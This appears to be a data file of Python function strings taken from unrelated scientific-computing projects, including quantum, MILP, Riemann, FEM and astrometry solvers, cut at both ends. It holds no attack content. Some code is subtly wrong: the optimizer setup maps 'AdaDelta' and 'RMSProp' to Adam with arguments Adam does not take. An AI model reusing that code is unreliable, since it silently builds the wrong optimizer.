self.adjust_to_excepted_value(self.RING_PARA_PAIR_CC[i]); \n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>> \n # print(self.RING_PARA_PAIR_CC[i][0].VECTOR); # ---------------------------------------------------------------->>>>>\n # print(RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]); # ---------------------------------------------------------------->>>>>\n # print(self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1])); # ---------------------------------------------------------------->>>>>\n # print( np.cumprod( self.RING_PARA_PAIR_CC[i][1] - self.RING_PARA_PAIR_CC[i][0].VECTOR )[-1] ); # ---------------------------------------------------------------->>>>>\n self.RING_PARA_PAIR_CC[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CC[i][2] = self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1]); # 更新内部ALPHA;\n \"\"\" Secondly,adjust the alpha_0 < p_min(y_n) < q_min(x_n)\"\"\" \n P_MIN = 99999999.0; Q_MIN = 99999999.0;P_MAX = 0.0;Q_MAX = 0.0;\n CD_ID = 0;CD_MIN=0;\n # 找到结论中谓词的最小多项式值\n for RING_PARA_PAIR in self.RING_PARA_PAIR_CC:\n if Q_MIN>RING_PARA_PAIR[2]: Q_MIN=RING_PARA_PAIR[2];\n # if Q_MAX<RING_PARA_PAIR[2]: Q_MAX=RING_PARA_PAIR[2];\n # 不满足小于结论最小值的那些环的TARGET_ALPHA更新; \n for RING_PARA_PAIR in self.RING_PARA_PAIR_CD:\n if P_MIN>RING_PARA_PAIR[2]: P_MIN=RING_PARA_PAIR[2];CD_MIN=CD_ID;# self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MIN;\n # if P_MAX<RING_PARA_PAIR[2]: P_MAX=RING_PARA_PAIR[2];self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MAX;\n CD_ID+=1;\n self.RING_PARA_PAIR_CD[CD_MIN][3]=-Q_MIN; \n # 优化不满足小于结论最小值的那些环 \n for i in range(len(self.RING_PARA_PAIR_CD)): \n if self.RING_PARA_PAIR_CD[i][3]!=ALPHA:\n if P_MIN>Q_MIN:\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]); \n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;", "def solver(direc):\r\n\r\n # open inputfile\r\n file = 'schroedinger.inp'\r\n fn = os.path.join(direc, file)\r\n inp_all = open(fn, 'r')\r\n\r\n # read parameters from inputfile\r\n lines = inp_all.readlines()\r\n inp_mass = lines[0].split()[0]\r\n mass = float(inp_mass)\r\n inp_xmin = lines[1].split()[0]\r\n xmin = float(inp_xmin)\r\n inp_xmax = lines[1].split()[1]\r\n xmax = float(inp_xmax)\r\n inp_npoint = lines[1].split()[2]\r\n npoint = int(inp_npoint)\r\n inp_firsteigval = lines[2].split()[0]\r\n firsteigval = int(inp_firsteigval)\r\n inp_lasteigval = lines[2].split()[1]\r\n lasteigval = int(inp_lasteigval)\r\n interpoltype = lines[3].split()[0]\r\n inp_nrinterpolpoints = lines[4].split()[0]\r\n nrinterpolpoints = int(inp_nrinterpolpoints)\r\n len_pot = len(lines)-5\r\n xpot = np.zeros(len_pot)\r\n ypot = np.zeros(len_pot)\r\n for ii in range(5, len_pot+5):\r\n xpot[ii - 5] = float(lines[ii].split()[0])\r\n ypot[ii - 5] = float(lines[ii].split()[1])\r\n\r\n # read interpolation type and interpolate the potential\r\n xx = np.linspace(xmin, xmax, npoint)\r\n if interpoltype == 'linear':\r\n pot = np.interp(xx, xpot, ypot)\r\n elif interpoltype == 'polynomial':\r\n degree = int(nrinterpolpoints - 1)\r\n coef = np.polyfit(xpot, ypot, degree)\r\n polf = np.poly1d(coef)\r\n pot = polf(xx)\r\n elif interpoltype == 'cspline':\r\n cubicf = interp1d(xpot, 
ypot, kind='cubic')\r\n pot = cubicf(xx)\r\n else:\r\n print('interpolation type not found')\r\n sys.exit(1)\r\n\r\n # save x- and y-values for interpolated potential in potential.dat file\r\n potential = np.array([xx, pot])\r\n xypotential = potential.T\r\n np.savetxt(os.path.join(direc, 'potential.dat'), xypotential)\r\n\r\n # formulate matrix-problem for the discretised Schroedinger equation\r\n matrix = np.zeros((npoint, npoint))\r\n delta = abs((xmax-xmin)/(npoint))\r\n aa = 1/(mass*(delta)**2)\r\n for ii in range(1, npoint):\r\n matrix[ii, ii-1] = -aa/2\r\n for ii in range(0, npoint):\r\n matrix[ii, ii] = aa+pot[ii]\r\n for ii in range(0, npoint-1):\r\n matrix[ii, ii+1] = -aa/2\r\n\r\n # compute eigenvalues and eigenvectors\r\n energy, wavefunc = scipy.linalg.eigh(matrix, eigvals=(int(firsteigval-1),\r\n int(lasteigval-1)))\r\n\r\n # normalize wavefunctions\r\n deltavec = delta*np.ones((1, npoint))\r\n wavefunc_sq = wavefunc**2\r\n norm_sq = np.dot(deltavec, wavefunc_sq)\r\n norm = 1/(np.sqrt(norm_sq))\r\n norm_wavefunc = np.dot(wavefunc, np.diag(np.reshape(norm,\r\n (len(energy), ))))\r\n\r\n # save eigenvalues and eigenvectors in energies.dat and wavefuncs.dat files\r\n np.savetxt(os.path.join(direc, 'energies.dat'), energy)\r\n wavefuncs = np.hstack((xx.reshape((npoint, 1)), norm_wavefunc))\r\n np.savetxt(os.path.join(direc, 'wavefuncs.dat'), wavefuncs)\r\n\r\n # compute expectation values and uncertainty for the position\r\n exp_value = np.zeros(lasteigval-firsteigval+1)\r\n exp_value_sq = np.zeros(lasteigval-firsteigval+1)\r\n uncert_x = np.zeros(lasteigval-firsteigval+1)\r\n for ii in range(firsteigval-1, lasteigval):\r\n exp_value[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx)\r\n exp_value_sq[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx**2)\r\n uncert_x[ii] = np.sqrt(exp_value_sq[ii]-exp_value[ii]**2)\r\n\r\n # save expectation values and uncertainty for the position in expvalues.dat\r\n expvalues = np.array([exp_value, uncert_x])\r\n datexpvalues = expvalues.T\r\n np.savetxt(os.path.join(direc, 'expvalues.dat'), datexpvalues)\r\n\r\n return xypotential, energy", "def solve(self):\n start = timer()\n # encode into milp\n me = MILPEncoder(MILPSolver.prob,\n MILPSolver.params.logger.LOGFILE, \n MILPSolver.params.INTRA_DEP_CONSTRS,\n MILPSolver.params.INTER_DEP_CONSTRS)\n if MILPSolver.lp == True:\n gmodel = me.lp_encode()\n else:\n gmodel = me.encode()\n # Set gurobi parameters\n pgo = 1 if MILPSolver.params.PRINT_GUROBI_OUTPUT == True else 0\n gmodel.setParam('OUTPUT_FLAG', pgo)\n tl = MILPSolver.params.TIMEOUT\n if tl != -1 : gmodel.setParam('TIME_LIMIT', tl)\n if not MILPSolver.params.DEFAULT_CUTS: \n MILPSolver.disable_default_cuts(gmodel)\n gmodel._vars = gmodel.getVars()\n # set callback cuts \n MILPSolver.id_form = IdealFormulation(MILPSolver.prob,\n gmodel, \n MILPSolver.params.IDEAL_FREQ,\n MILPSolver.params.logger.LOGFILE)\n MILPSolver.dep_cuts = DepCuts(MILPSolver.prob,\n gmodel,\n MILPSolver.params.DEP_FREQ,\n MILPSolver.params.INTRA_DEP_CUTS,\n MILPSolver.params.INTER_DEP_CUTS,\n MILPSolver.sip_params,\n MILPSolver.params.logger.LOGFILE)\n # Optimise\n if MILPSolver.params.callback_enabled() and MILPSolver.lp == False:\n gmodel.optimize(MILPSolver._callback)\n else:\n gmodel.optimize()\n\n runtime = timer() - start\n cex = None \n if MILPSolver.status == SolveResult.BRANCH_THRESHOLD:\n result = SolveResult.BRANCH_THRESHOLD\n elif gmodel.status == GRB.OPTIMAL:\n cex_shape = MILPSolver.prob.spec.input_layer.input_shape\n cex = np.zeros(cex_shape)\n for i in 
itertools.product(*[range(j) for j in cex_shape]):\n cex[i] = MILPSolver.prob.spec.input_layer.out_vars[i].x\n result = SolveResult.UNSATISFIED\n elif gmodel.status == GRB.TIME_LIMIT:\n result = SolveResult.TIMEOUT\n elif gmodel.status == GRB.INTERRUPTED:\n result = SolveResult.INTERRUPTED\n elif gmodel.status == GRB.INFEASIBLE or gmodel.status == GRB.INF_OR_UNBD:\n result = SolveResult.SATISFIED\n else:\n result = SolveResult.UNKNOWN\n \n # MILPSolver.logger.info('Verification problem {} solved, '\n # 'LP: {}, '\n # 'time: {:.2f}, '\n # 'result: {}.'\n # .format(MILPSolver.prob.id,\n # MILPSolver.lp,\n # runtime,\n # result.value))\n \n return SolveReport(result, runtime, cex)", "def _set_up_acq_opt_rand(self):\n def _random_max_wrap(*args):\n \"\"\" A wrapper so as to only return optimal point.\"\"\"\n _, opt_pt = random_maximise(*args)\n return opt_pt\n # Set this up in acq_optimise\n self.acq_optimise = lambda obj, max_evals: _random_max_wrap(obj, self.domain_bounds,\n max_evals)\n if self.get_acq_opt_max_evals is None:\n lead_const = 10 * min(5, self.domain_dim)**2\n self.get_acq_opt_max_evals = lambda t: np.clip(\n lead_const * np.sqrt(min(t, 1000)), 2000, 3e4)\n # Acquisition function should be evaluated via multiple evaluations\n self.acq_query_type = 'multiple'", "def construct_inv_boundaries(params,par_dict,eq_dict,K_RC,K_CP,m_P):\n #intrapop params\n q1=par_dict['q1']\n q2=par_dict['q2']\n K =par_dict['K']\n m_C= K_CP*m_P\n q10 = params['q10']\n q20 = params['q20']\n hC0 = params['hC0']\n hP0 = params['hP0']\n\n #interpop params\n a1=par_dict['a1']\n a2=par_dict['a2']\n a3=par_dict['a3']\n e1=params['e1']\n e2=params['e2']\n e3=params['e3']\n \n\n t_hc = par_dict['t_hc']\n t_hp = par_dict['t_hp']\n\n #eq values\n\n #L-V\n R_eq_s2 = eq_dict['R_eq_s2']\n C_eq_s2 = eq_dict['C_eq_s2']\n P_eq_s3 = eq_dict['P_eq_s3']\n R_eq_s3 = eq_dict['R_eq_s3']\n #R-M\n R_eq_s2RM = eq_dict['R_eq_s2RM']\n C_eq_s2RM = eq_dict['C_eq_s2RM']\n R_eq_s3RM = eq_dict['R_eq_s3RM']\n P_eq_s3RM = eq_dict['P_eq_s3RM']\n \n ##Invasibility boundaries\n\n #L-V\n I_C_s2 = set_I_C_s2(e1,a1,K,q1)\n I_P_s3 = set_I_P_s3(e2,a2,K,q2)\n I_P_s4 = set_I_P_s4(e2,e3,a2,a3,q2,R_eq_s2,C_eq_s2)\n I_C_s5 = set_I_C_s5(e1,a1,a3,R_eq_s3,P_eq_s3,q1)\n \n #R-M\n I_C_s2RM = set_I_C_s2RM(e1,a1,K,q1,hC0,q10)\n I_P_s3RM = set_I_P_s3RM(e2,a2,K,q2,hP0,q20)\n I_P_s4RM = set_I_P_s4RM(e2,e3,a2,a3,q2,R_eq_s2RM,C_eq_s2RM,hP0,q20)\n I_C_s5RM = set_I_C_s5RM(e1,e2,a1,a3,m_C,R_eq_s3RM,P_eq_s3RM,q1,t_hc,q10,q20,hP0,hC0) \n\n inv_dict= {'I_C_s2':I_C_s2,'I_P_s3':I_P_s3,'I_P_s4':I_P_s4,'I_C_s5':I_C_s5,\n 'I_C_s2RM':I_C_s2RM,'I_P_s3RM':I_P_s3RM,'I_P_s4RM':I_P_s4RM,'I_C_s5RM':I_C_s5RM}\n\n return inv_dict", "def _compute_guess_p(rho_l, u_l, p_l, c_l, rho_r, u_r, p_r, c_r):\n quser = 2.0\n p_linearized = 0.5 * (p_l + p_r) + 0.5 * (u_l - u_r) * \\\n 0.25 * (rho_l + rho_r) * (c_l + c_r)\n p_linearized = max(0.0, p_linearized)\n p_min = min(p_l, p_r)\n p_max = max(p_l, p_r)\n qmax = p_max / p_min\n if(\n qmax <= quser and (p_min <= p_linearized and\n p_linearized <= p_max)\n ):\n \"\"\"A Primitive Variable Riemann Solver (PMRS)\"\"\"\n return p_linearized\n else:\n \"\"\"A Two-Rarefaction Riemann Solver (TRRS)\"\"\"\n if p_linearized < p_min:\n p_lr = (p_l / p_r)**gm1_2g\n u_linearized = (p_lr * u_l / c_l + u_r / c_r + (2 / gm1) *\n (p_lr - 1.0)) / (p_lr / c_l + 1.0 / c_r)\n return (\n 0.5 * (p_l * (1.0 + gm1_2 * (u_l - u_linearized) /\n c_l)**(1.0 / gm1_2g) +\n p_r * (1.0 + gm1_2 * (u_linearized - u_r) / c_r) **\n (1.0 / gm1_2g))\n )\n else:\n \"\"\"A 
Two-Shock Riemann Solver (TSRS)\"\"\"\n gL = sqrt(((2 / gp1) / rho_l) /\n (gm1_gp1 * p_l + p_linearized))\n gR = sqrt(((2 / gp1) / rho_r) /\n (gm1_gp1 * p_r + p_linearized))\n return (gL * p_l + gR * p_r - (u_r - u_l)) / (gL + gR)", "def correct(self):\n stop_flag = False\n self.orbit_class.online_calc = False\n # read orbit devs\n for elem in self.orbit.corrs:\n try:\n elem.kick_mrad = elem.mi.get_value()\n except Exception as e:\n stop_flag = True\n logger.warning(elem.id + \" reading error: \" + str(e))\n return stop_flag\n \n elem.angle_read = elem.kick_mrad*1e-3\n elem.i_kick = elem.kick_mrad\n elem.ui.set_init_value(elem.kick_mrad)\n elem.ui.set_value(elem.kick_mrad)\n elem.transfer_map = self.parent.lat.method.create_tm(elem)\n if elem.ui.alarm:\n stop_flag = True\n logger.warning(\"correct - STOP: corrector shows alarm: \" + elem.id)\n\n\n #self.parent.lat.update_transfer_maps()\n\n for elem in self.orbit.bpms:\n if elem.id not in self.new_ref_orbit.keys():\n logger.warning(\"correct - STOP: BPM is not in new ref orbit: \" + elem.id)\n stop_flag = True\n return stop_flag\n elem.x = self.new_ref_orbit[elem.id][0]\n elem.y = self.new_ref_orbit[elem.id][1]\n elem.ui.set_value((elem.x*1000., elem.y*1000.))\n if elem.ui.alarm:\n logger.warning(\"correct - STOP: BPM shows alarm: \" + elem.id)\n stop_flag = True\n if stop_flag:\n return stop_flag\n self.orbit_class.online_calc = True\n\n\n if not self.orbit_class.is_rm_ok(self.orbit):\n logger.error(\" correct: Calculate Response Matrix\")\n self.parent.error_box(\"Calculate Response Matrix\")\n return 0\n\n self.orbit_class.golden_orbit.dict2golden_orbit()\n\n if self.orbit_class.ui.cb_close_orbit.isChecked():\n self.orbit_class.close_orbit()\n\n self.calc_correction = {}\n for cor in self.orbit.corrs:\n cor.angle = 0.\n self.calc_correction[cor.id] = cor.angle\n\n alpha = 0.\n\n self.orbit.correction(alpha=alpha, p_init=None, beta=0, print_log=False)\n for cor in self.orbit.corrs:\n self.calc_correction[cor.id] = cor.angle\n\n self.set_values2correctors()\n return stop_flag", "def solve(self, state, times):", "def set_optimizer_params(self):\n n_params = len(self.optim_params)\n if self.optimizer_name == 'GradientDescent' and n_params == 1:\n self.optimizer = tf.keras.optimizers.SGD(\n learning_rate=self.optim_params[0],\n momentum=0)\n elif self.optimizer_name == 'Momentum' and n_params == 2:\n self.optimizer = tf.keras.optimizers.SGD(\n learning_rate=self.optim_params[0],\n momentum=self.optim_params[1])\n elif self.optimizer_name == 'AdaGrad' and n_params == 2:\n self.optimizer = tf.keras.optimizers.Adagrad(\n learning_rate=self.optim_params[0],\n initial_accumulator_value=self.optim_params[1])\n elif self.optimizer_name == 'AdaDelta' and n_params == 2:\n self.optimizer = tf.keras.optimizers.Adam(\n learning_rate=self.optim_params[0],\n rho=self.optim_params[1])\n elif self.optimizer_name == 'RMSProp' and n_params == 3:\n self.optimizer = tf.keras.optimizers.Adam(\n learning_rate=self.optim_params[0],\n rho=self.optim_params[1],\n momentum=self.optim_params[2])\n elif self.optimizer_name == 'Adam' and n_params == 3:\n self.optimizer = tf.keras.optimizers.Adam(\n learning_rate=self.optim_params[0],\n beta_1=self.optim_params[1],\n beta_2=self.optim_params[2])\n elif self.optimizer_name == 'Nadam' and n_params == 3:\n self.optimizer = tf.keras.optimizers.Nadam(\n learning_rate=self.optim_params[0],\n beta_1=self.optim_params[1],\n beta_2=self.optim_params[2])\n else:\n raise Exception(\"[ERROR] Wrong optimizer or parameters for \"\n 
\"optimizer\")", "def process_solve_kwargs(**kwargs):\n\n tol = kwargs.get('tol', DEFAULT_TOL)\n maxiter = kwargs.get('maxiter', MAX_ITER)\n Ainv = kwargs.get('Ainv', None)\n verbose = kwargs.get('verbose', False)\n\n if VERBOSE:\n print(\"tol:\", tol)\n print(\"maxiter:\", maxiter)\n print(\"Ainv:\", Ainv)\n\n return tol, int(maxiter), Ainv, verbose", "def _set_up_acq_opt(self):\n # First set up function to get maximum evaluations.\n if isinstance(self.options.acq_opt_max_evals, int):\n if self.options.acq_opt_max_evals > 0:\n self.get_acq_opt_max_evals = lambda t: self.options.acq_opt_max_evals\n else:\n self.get_acq_opt_max_evals = None\n else: # In this case, the user likely passed a function here.\n self.get_acq_opt_max_evals = self.options.acq_opt_max_evals\n # Additional set up based on the specific optimisation procedure\n if self.options.acq_opt_criterion == 'direct':\n self._set_up_acq_opt_direct()\n elif self.options.acq_opt_criterion == 'rand':\n self._set_up_acq_opt_rand()\n else:\n raise NotImplementedError('Not implemented acquisition optimisation for %s yet.'%(\n self.options.acq_opt_criterion))", "def solve(self, F, u0=None, maxiter=100, rtol=1.e-6, rtol2=1.e-6 \\\n , verbose=False, update=False):\n # assembly the stifness matrix and bc terms\n poisson.assembly(self, update=update)\n\n # project u0 onto the discrete vectorial space\n self.initialize(u0=u0)\n\n # ...\n PDE = self\n V = PDE.space\n un = PDE.unknown\n rhs = self.rhs\n # ...\n\n rhs.func = F\n\n # ...\n from time import time\n list_Err = [1.e6]\n list_ErrH1 = [1.e6]\n un_values = un.get()\n normH1_old = np.dot(PDE.dot(un.get()), un.get())\n i = 0\n if verbose:\n tb = time()\n while (list_Err[-1] > rtol) and (list_ErrH1[-1] > rtol2) and (i < maxiter):\n U_old_values = un.get()\n# print \"-------\"\n# print \"solve\"\n# import matplotlib.pyplot as plt\n## Phi = PDE.G_W\n# Phi = PDE.unknown_dirichlet\n## Phi.plot(withpcolor=True) ; plt.colorbar() ; plt.show()\n# Phi.fast_plot() ; plt.colorbar() ; plt.show()\n# print \"-------\"\n\n # assembly the right hand side\n rhs.reset()\n self.update()\n # solve and update unew\n poisson.solve(self, rhs)\n\n U_values = un.get()\n err = np.linalg.norm(U_values-U_old_values)\n list_Err.append(err)\n\n normH1 = np.dot(PDE.dot(un.get()), un.get())\n list_ErrH1.append(np.abs(normH1-normH1_old))\n\n normH1_old = normH1\n\n i += 1\n if verbose:\n print(i, \": \",\" |F(x)| = \", list_Err[-1],\" |DF(x)| = \", list_ErrH1[-1])\n if verbose:\n te = time()\n print(\">> Elapsed time \", te-tb)\n\n list_Err = np.asarray(list_Err[1:])\n list_ErrH1 = np.asarray(list_ErrH1[1:])\n return list_Err, list_ErrH1", "def solve(\n self, preconditioner='none', tol=1e-5,\n operator_parameters=None, preconditioner_parameters=None\n ):\n time_assemble = -time.clock() # start timer\n\n self.operator = self.assemble_operator(operator_parameters)\n self.rhs = self.assemble_rhs(operator_parameters)\n\n if preconditioner == 'none':\n super_operator = self.operator\n super_rhs = self.rhs\n elif preconditioner == 'diagonal':\n diagonal = self.get_diagonal(preconditioner_parameters) \n super_operator = diagonal * self.operator\n super_rhs = diagonal * self.rhs\n elif preconditioner == 'self':\n preconditioner = self.get_op_as_preconditioner(preconditioner_parameters)\n super_operator = preconditioner * self.operator\n super_rhs = preconditioner * self.rhs\n # elif preconditioner == 'electric-interior':\n # pass\n else:\n raise NotImplementedError(\n \"Preconditioner '%s' not supported\" % preconditioner)\n\n if 
hasattr(super_operator, 'strong_form'):\n super_operator.strong_form(True)\n \n time_assemble += time.clock() # stop timer\n\n bempp.api.MATVEC_COUNT = 0 # reset the MATVEC counter to 0\n solve_time = -time.clock() # initialise the timer\n sol, solve_info, residuals = self._gmres(super_operator, super_rhs, tol)\n solve_time += time.clock() # stop the timer\n matvec_count = bempp.api.MATVEC_COUNT # sample the matvec counter\n \n info = dict(\n status=solve_info,\n time_solve=solve_time,\n time_assemble=time_assemble,\n matvec_count=matvec_count\n )\n if isinstance(sol[0], np.complex128):\n return Solution(coefficients=sol, info=info, residuals=residuals, system=self) \n else:\n return Solution(traces=sol, info=info, residuals=residuals, system=self)", "def solve(self, solver={}, fitsPath='', raHint=None, decHint=None, scaleHint=None,\n radius=2, timeout=30, updateFits=False):\n\n self.process = None\n self.result = {'success': False}\n\n if not solver:\n return False\n if not os.path.isfile(fitsPath):\n self.result['message'] = 'image missing'\n return False\n\n tempPath = self.tempDir + '/temp.xy'\n configPath = self.tempDir + '/astrometry.cfg'\n solvedPath = self.tempDir + '/temp.solved'\n wcsPath = self.tempDir + '/temp.wcs'\n binPathImage2xy = solver['programPath'] + '/image2xy'\n binPathSolveField = solver['programPath'] + '/solve-field'\n\n if os.path.isfile(wcsPath):\n os.remove(wcsPath)\n\n cfgFile = self.tempDir + '/astrometry.cfg'\n with open(cfgFile, 'w+') as outFile:\n outFile.write('cpulimit 300\\n')\n outFile.write(f'add_path {solver[\"indexPath\"]}\\n')\n outFile.write('autoindex\\n')\n\n # using sextractor in astrometry.net and KStars\n \"\"\"\n with open('default.param', 'w+') as outFile:\n outFile.write('MAG_AUTO Kron-like elliptical aperture magnitude [mag]\\n')\n outFile.write('X_IMAGE Object position along x [pixel]\\n')\n outFile.write('Y_IMAGE Object position along y [pixel]\\n')\n\n with open('default.conv', 'w+') as outFile:\n outFile.write('CONV NORM\\n')\n outFile.write('1 2 1\\n')\n outFile.write('2 4 2\\n')\n outFile.write('1 2 1\\nn')\n \"\"\"\n suc = self.runImage2xy(binPath=binPathImage2xy,\n tempPath=tempPath,\n fitsPath=fitsPath,\n timeout=timeout,\n )\n if not suc:\n self.log.error(f'image2xy error in [{fitsPath}]')\n self.result['message'] = 'image2xy failed'\n return False\n\n raFITS, decFITS, scaleFITS, _, _ = self.readFitsData(fitsPath=fitsPath)\n\n # if parameters are passed, they have priority\n if raHint is None:\n raHint = raFITS\n if decHint is None:\n decHint = decFITS\n if scaleHint is None:\n scaleHint = scaleFITS\n\n searchRatio = 1.1\n ra = transform.convertToHMS(raHint)\n dec = transform.convertToDMS(decHint)\n scaleLow = scaleHint / searchRatio\n scaleHigh = scaleHint * searchRatio\n options = ['--scale-low',\n f'{scaleLow}',\n '--scale-high',\n f'{scaleHigh}',\n '--ra',\n f'{ra}',\n '--dec',\n f'{dec}',\n '--radius',\n f'{radius:1.1f}',\n ]\n\n # split between ekos and cloudmakers as cloudmakers use an older version of\n # solve-field, which need the option '--no-fits2fits', whereas the actual\n # version used in KStars throws an error using this option.\n if 'Astrometry.app' in solver['programPath']:\n options.append('--no-fits2fits')\n\n suc = self.runSolveField(binPath=binPathSolveField,\n configPath=configPath,\n tempPath=tempPath,\n options=options,\n timeout=timeout,\n )\n if not suc:\n self.log.error(f'solve-field error in [{fitsPath}]')\n self.result['message'] = 'solve-field error'\n return False\n\n if not 
os.path.isfile(solvedPath):\n self.log.info(f'solve files for [{fitsPath}] missing')\n self.result['message'] = 'solve failed'\n return False\n\n if not os.path.isfile(wcsPath):\n self.log.info(f'solve files for [{wcsPath}] missing')\n self.result['message'] = 'solve failed'\n return False\n\n with fits.open(wcsPath) as wcsHDU:\n wcsHeader = self.getWCSHeader(wcsHDU=wcsHDU)\n\n with fits.open(fitsPath, mode='update') as fitsHDU:\n solve, header = self.getSolutionFromWCS(fitsHeader=fitsHDU[0].header,\n wcsHeader=wcsHeader,\n updateFits=updateFits)\n fitsHDU[0].header = header\n\n self.result = {\n 'success': True,\n 'solvedPath': fitsPath,\n 'message': 'Solved',\n }\n self.result.update(solve)\n\n return True", "def do_optimisation(self):\n\n print('--> Parameters for optimisation:')\n print('--> Using measurements : {}'.format(self.stoma_cfg.comparison_helper.optimisation_keys))\n print('')\n\n x0 = self.initial_guess()\n\n tol, eps = 1e-4, 0.001\n\n print('--> Using SLSQP with tol={} and eps={}'.format(tol, eps))\n\n soln = opt.minimize(fun=self.optimise_fn,\n x0=x0,\n method='SLSQP',\n tol=tol,\n options={'eps': eps})\n\n print('*' * 120)\n print('--> Optimisation procedure has finished...')\n print(soln)\n print('*' * 120)\n\n if soln.success:\n print('--> Optimisation succeeded. Result is...')\n self._set_material_parameters(soln.x)\n print('--> {}'.format(self.material_model))\n else:\n print('--> The optimisation failed!')\n\n print('*' * 120)\n\n return soln", "def _propagateOrbits(self, orbits, t1):\n err = \"This backend does not have orbit propagation implemented.\"\n raise NotImplementedError(err)", "def contract_tenors(self):\n\n\tself.r_outer_r[:,:,0,1,:] = self.r_outer_r[:,:,0,1,:]/(1. - self.k_dot_r[0,1,:])\n\tself.r_outer_r[:,:,0,2,:] = self.r_outer_r[:,:,0,2,:]/(1. - self.k_dot_r[0,2,:])\n\t\n\tself.r_outer_r[:,:,1,0,:] = self.r_outer_r[:,:,1,0,:]/(1. - self.k_dot_r[1,0,:])\n\tself.r_outer_r[:,:,1,2,:] = self.r_outer_r[:,:,1,2,:]/(1. - self.k_dot_r[1,2,:])\n\t\n\tself.r_outer_r[:,:,2,0,:] = self.r_outer_r[:,:,2,0,:]/(1. - self.k_dot_r[2,0,:])\n\tself.r_outer_r[:,:,2,1,:] = self.r_outer_r[:,:,2,1,:]/(1. - self.k_dot_r[2,1,:])\n\n\tself.delta_l = np.zeros((3,3,self.N),dtype=np.complex_)\n \n\tself.delta_l[0,1,:] = get_l(self,0,1)\n\tself.delta_l[1,0,:] = get_l(self,1,0)\n\t\n\tself.delta_l[0,2,:] = get_l(self,0,2)\n\tself.delta_l[2,0,:] = get_l(self,2,0)\n\t\n\tself.delta_l[1,2,:] = get_l(self,1,2)\n\tself.delta_l[2,1,:] = get_l(self,2,1)\n \n\treturn", "def updateParameters(self):\n\n if self.params[1].value:\n if arcpy.Exists(self.params[1].value):\n try:\n min_value = arcpy.GetRasterProperties_management(self.params[1].value, \"MINIMUM\")[0]\n\n if str(self.params[8].value) != str(self.params[1].value):\n self.params[7].value = True\n self.params[8].value = str(self.params[1].value)\n else:\n self.params[7].value = False\n\n if str(min_value) == \"0\":\n if self.params[7].value == True:\n self.params[2].value = True\n self.params[3].enabled = True\n self.params[7].value = False\n else:\n self.params[2].value = False\n self.params[3].enabled = False\n\n except arcpy.ExecuteError:\n pass\n\n if self.params[2].value == True:\n self.params[3].enabled = True\n else:\n self.params[3].enabled = False", "def apply_inplace(self, array: Tuple['Nparray', ...]) -> None:\n\n len_arr = len(array)\n if (len_arr < 1 or len_arr > 4):\n raise ValueError(\"Number of operators in tuple must be \"\n \"between 1 and 4.\")\n\n # Get the first numpy array (i.e. 
a non-None object) in array\n # and use its dimensions to determine whether we have spatial or spin orbitals\n # Necessary since 1-body operator cam be absent\n array_for_dimensions = next(\n filter(lambda x: isinstance(x, numpy.ndarray), array), False)\n\n if isinstance(array_for_dimensions, bool):\n # this can only be False\n assert (not array_for_dimensions)\n return\n\n spatial = array_for_dimensions.shape[0] == self.norb()\n ## check correct dimensions in case of spin orbitals\n if not spatial and array_for_dimensions.shape[0] != 2 * self.norb():\n raise ValueError(\"Inconsistent number of spin-orbitals in \"\n \"operators and wavefunction.\")\n if len_arr == 1:\n if spatial:\n self.coeff = self._apply_array_spatial1(array[0])\n else:\n self.coeff = self._apply_array_spin1(array[0])\n elif len_arr == 2:\n if spatial:\n self.coeff = self._apply_array_spatial12(array[0], array[1])\n else:\n self.coeff = self._apply_array_spin12(array[0], array[1])\n elif len_arr == 3:\n if spatial:\n self.coeff = self._apply_array_spatial123(\n array[0], array[1], array[2])\n else:\n self.coeff = self._apply_array_spin123(array[0], array[1],\n array[2])\n elif len_arr == 4:\n if spatial:\n self.coeff = self._apply_array_spatial1234(\n array[0], array[1], array[2], array[3])\n else:\n self.coeff = self._apply_array_spin1234(array[0], array[1],\n array[2], array[3])", "def _redef_sp1_vars(self):\r\n\r\n if len(self.fq_list) == 0:\r\n no_rad = True\r\n lst_tmp = np.matrix(np.reshape(self.lst_tmp, \r\n (self.lst_tmp.size, 1)))\r\n else: no_rad = False\r\n # The practically constants...\r\n # Big Epsilon:\r\n if self.cond == True:\r\n self.Epsilon = self.d_T * self.thermal_conductivity\r\n else:\r\n self.Epsilon = (self.diff_scale ** 2) / \\\r\n (3.0 * self.absorb_coeffs[self.rad] ** 2)\r\n # Beta:\r\n if self.cond == True:\r\n self.Beta = (self.diff_scale * self.thermal_conductivity) / \\\r\n (self.convect_coeff)\r\n else:\r\n self.Beta = (1.0 + 3.0 * self.r2) * (2.0 * self.diff_scale) / \\\r\n ((1.0 - 2.0 * self.r1) * (\r\n 3.0 * self.absorb_coeffs[self.rad]))\r\n\r\n # The feild solutions at the last timestep.\r\n # The integral vF:\r\n if self.cond == True:\r\n # The horrifically complicated F:\r\n def F_func_cond(elem, eta):\r\n F = 0.0\r\n Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]\r\n F += Tn\r\n for k in range(0, len(self.fq_list)):\r\n vk = self.fq_list[k]\r\n try:\r\n vk_m = self.fq_list[k - 1]\r\n except:\r\n vk_m = self.v0_frequency\r\n absorbtion = self.absorb_coeffs[k]\r\n phi = elem.eval_elem(self.node_map, self.lst_rad[k],\r\n [eta])[0]\r\n inter1 = phi - 4.0 * sconst.pi * \\\r\n self.B_int_function(Tn, self.refr_idx_vol,\r\n vk, vk_m)\r\n inter2 = absorbtion * self.d_T / (self.diff_scale ** 2)\r\n F += inter2 * 